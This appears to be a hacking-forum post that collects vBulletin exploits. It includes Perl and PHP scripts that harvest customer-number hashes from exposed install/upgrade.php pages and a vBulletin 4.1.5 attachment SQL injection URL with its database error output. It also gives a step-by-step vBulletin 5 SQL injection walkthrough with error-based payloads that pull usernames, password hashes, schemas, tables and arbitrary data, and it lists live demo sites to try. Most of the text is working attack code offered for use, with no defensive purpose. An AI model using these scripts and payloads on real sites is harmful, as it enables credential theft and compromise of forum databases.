leaked by the injector

1. vBulletin x.x.x Customer Area 0day
2. -------------------------------------------------
3. vBulletin x.x.x Customer Area 0day
4. Perl script got leaked so decided to post the perl script here
5.  
6. Code:
7. #!/usr/bin/perl
8.  
9. use LWP::UserAgent;
10. use HTTP::Request::Common;
11.  
12.  
13. system('cls');
14. system('title vBulletin Install Auto Exploiter');
15. print "\n ---------------------------------------";
16. print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
17. print " ---------------------------------------\n";
18. print " + d4tabase.com -+- d4tabase.com + ";
19. print "\n ---------------------------------------\n";
20. print " coded by n0tch shoutz d4tabase crew ";
21. print "\n ---------------------------------------\n";
22.  
23.  
24. if($#ARGV == -1 or $#ARGV > 0)
25. {
26. print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
27. exit;
28. }
29.  
30.  
31. $domain = $ARGV[0];
32. $install_dir = "install";
33. $full_domain = "http://$domain/$install_dir/upgrade.php";
34. chop($domain);
35.  
36.  
37. &search;
38.  
39.  
40.  
41.  
42. sub search
43. {
44. $url = $full_domain;
45. $lwp = LWP::UserAgent->new();
46. $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
47. $request = $lwp->post($url, ["searchHash" => "Search"]);
48.  
49.  
50. print " Searching $domain ----\n ";
51. if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
52. {
53. print "Result : $1\n";
54. } else {
55. print "Hash: Hash not found!\n";
56. }
57. }
58.  
59.  
60.  
61.  
62.  
63.  
64. php exploit -
65. --------------------
66.  
67.  
68. <?php
69. set_time_limit(0);
70.  
71.  
72. if($argc < 2) {
73. echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
74. exit;
75. }
76.  
77.  
78. $URL = $argv[1];
79. $arr = parse_url($URL);
80.  
81.  
82. ### work with url
83. if(strpos($URL, '?')) die("Ohh, your URL is not valid");
84. if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
85. if(!$arr['scheme']) $URL = 'http://' . $URL;
86.  
87.  
88. $headers = get_headers($URL . '/install/upgrade.php');
89. if(substr($headers[0], 9, 3) == '200') {
90. $source = file_get_contents($URL . "/install/upgrade.php");
91. }
92. elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
93. if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
94. }
95. else die("something went wrong...");
96.  
97.  
98. preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
99. foreach ($res[1] as $hash) {
100. echo "Hash: " . $hash . PHP_EOL;
101. $fp = fopen("hash.txt", "a+");
102. fwrite($fp, $hash . PHP_EOL);
103. }
104. ?>
105. ------------------------------------------------------------------------
106. vbulletin 4.1.5 attachment SQLI
107.  
108.  
109. vbulletin 4.1.5 attachment SQLI
110. examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL query. Example:
111.  
112. Code:
113. http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
114. After that, we see the standard error of the database offline, thus opening the source code of the page and see:
115.  
116.  
117. Code:
118. <! -
119. Database error in vBulletin 4.1.5 :
120.  
121. Invalid SQL :
122.  
123. SELECT
124. permissionsfrom , Hidden , setpublish , publishdate , userid
125. FROM ds23fSDdfsdf_cms_node
126. WHERE
127. nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
128.  
129. MySQL Error : Duplicate column Name .1.49-3 '5 '
130. Error Number : 1060
131. Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
132. Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
133.  
134.  
135. Address : 127.0.0.1
136. Username : Hacker
137. Classname : vB_Database
138. MySQL Version :
139. ->
140.  
141. ----------------------------------------------
142. vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
143. _ _ _ _ _____ _____ ___ _____ _ ______
144. | | | | | | | | | _ | | _ |/ _ \ |_ _| (_) | ___|
145. | |_| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_\ \ | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___
146. | _ |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__/ _ \| |/ _` | '_ \| _/ _ \| '__/ _` |/ _ \
147. | | | | (_| | (__| <| |_| | (_| | | | (_| | \ |_/ /> <\ |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/
148. \_| |_/\__,_|\___|_|\_\\__, |\__,_|_| \__,_| \___//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|
149. __/ | _/ | __/ |
150. |___/ |__/ |___/
151. ____ ____ __ _ ______ ____ ____
152. _ __/ __ )__ __/ / /__ / /_(_)___ / ____/ / __ \/ __ \____ ___ __
153. | | / / __ / / / / / / _ \/ __/ / __ \ /___ \ / / / / / / / __ `/ / / /
154. | |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ /
155. |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, /
156. /____/
157.  
158. ************************************************** ****************
159. #Title: vBulletin 5 SQL Injection > Beta Whatever
160. #Author: 0x0A
161. #Date: Dec 11, 2012
162. #Category: web application
163. #Type: SQL Injection
164. #Requirements: Firefox/Live HTTP Headers/
165. #Software Link: http://www.vbulletin.com/purchases/
166. http://www.vbulletin.com/features/
167. #Homepage: hackyard.net
168. ***********.com
169. #Version: 5 and above(not older versions)
170. #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
171. #Demo sites to try: http://www.sultantheme.com/vb5connectforum/
172. http://vb5connect.com/bb/
173. ************************************************** ****************
174.  
175.  
176.  
177. -------------------------------------------------------------------
178. -------------------------------------------------------------------
179. How to
180. -------------------------------------------------------------------
181. -------------------------------------------------------------------
182.  
183.  
184. -------------------------------------------------------------------
185. ================================================== =================
186. -------------------------------------------------------------------
187. [#1] First of all, make an account to the vBulletin 5 forum,
188.  
189. http://img402.imageshack.us/img402/7784/69376730.png
190. -------------------------------------------------------------------
191. ================================================== =================
192. -------------------------------------------------------------------
193.  
194.  
195.  
196. -------------------------------------------------------------------
197. ================================================== =================
198. -------------------------------------------------------------------
199. [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
200.  
201. http://imageshack.us/a/img12/305/89268702.png
202. -------------------------------------------------------------------
203. ================================================== =================
204. -------------------------------------------------------------------
205.  
206.  
207. -------------------------------------------------------------------
208. ================================================== =================
209. -------------------------------------------------------------------
210. [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
211.  
212. http://imageshack.us/a/img707/9990/68621087.png
213. -------------------------------------------------------------------
214. ================================================== =================
215. -------------------------------------------------------------------
216.  
217.  
218. -------------------------------------------------------------------
219. ================================================== =================
220. -------------------------------------------------------------------
221. [#4] Then, on Send POST Content use this:
222.  
223. -------------------------------------------------------------------------------------------------------------------------------------------------------------------
224. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
225. -------------------------------------------------------------------------------------------------------------------------------------------------------------------
226.  
227. http://imageshack.us/a/img42/1590/26447606.png
228.  
229. //Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
230. The following SQLi command will fetch out the first record from user table(username/password).
231. -------------------------------------------------------------------
232. ================================================== =================
233. -------------------------------------------------------------------
234.  
235.  
236.  
237.  
238. -------------------------------------------------------------------
239. ================================================== =================
240. -------------------------------------------------------------------
241. [#Other SQLi Syntaxes]
242.  
243. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
244. |Version():
245. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
246. nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
247. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
248.  
249.  
250.  
251. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
252. |User():
253. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
254. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
255. nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
256. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
257.  
258.  
259.  
260. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
261. |Database():
262. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
263. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
264. nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
265. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
266.  
267.  
268. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
269. |Database Print:
270. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
271. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
272. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
273. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
274.  
275.  
276.  
277. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
278. |Table Count:
279. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
280. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
281. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
282. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
283.  
284.  
285.  
286. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
287. |Print Tables:
288. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
289. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
290. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
291. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
292.  
293.  
294.  
295. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
296. |Columns of selected table:
297. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
298. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
299. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
300. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
301.  
302.  
303.  
304. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
305. |Fetch Out Data:
306. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
307. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
308. nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
309. +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
310.  
311. -------------------------------------------------------------------
312. ================================================== =================
313. -------------------------------------------------------------------
314.  
315. |
316. \ ' /
317. -- (*) --
318. >*<
319. >0<@<
320. >>>@<<*
321. >@>*<0<<<
322. >*>>@<<<@<<
323. >@>>0<<<*<<@<
324. >*>>0<<@<<<@<<<
325. >@>>*<<@<>*<<0<*<
326. \*/ >0>>*<<@<>0><<*<@<<
327. ___\\U//___ >*>>@><0<<*>>@><*<0<<
328. |\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<<
329. | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
330. |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
331. Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_
332. """"|'.'.'.|~~|.*.*.*| ____|_
333. |'.'.'.| |____|>>>>>>|
334. ~~~~~~~~ '""""`------'
335.  
336.  
337.  
338. ----------------------------------------------------
339.  
340. ==[ That`s it!
341. ==[ Thanks, 0x0A!
342. ==[ Romania
343.  
344. ----------------------------------------------------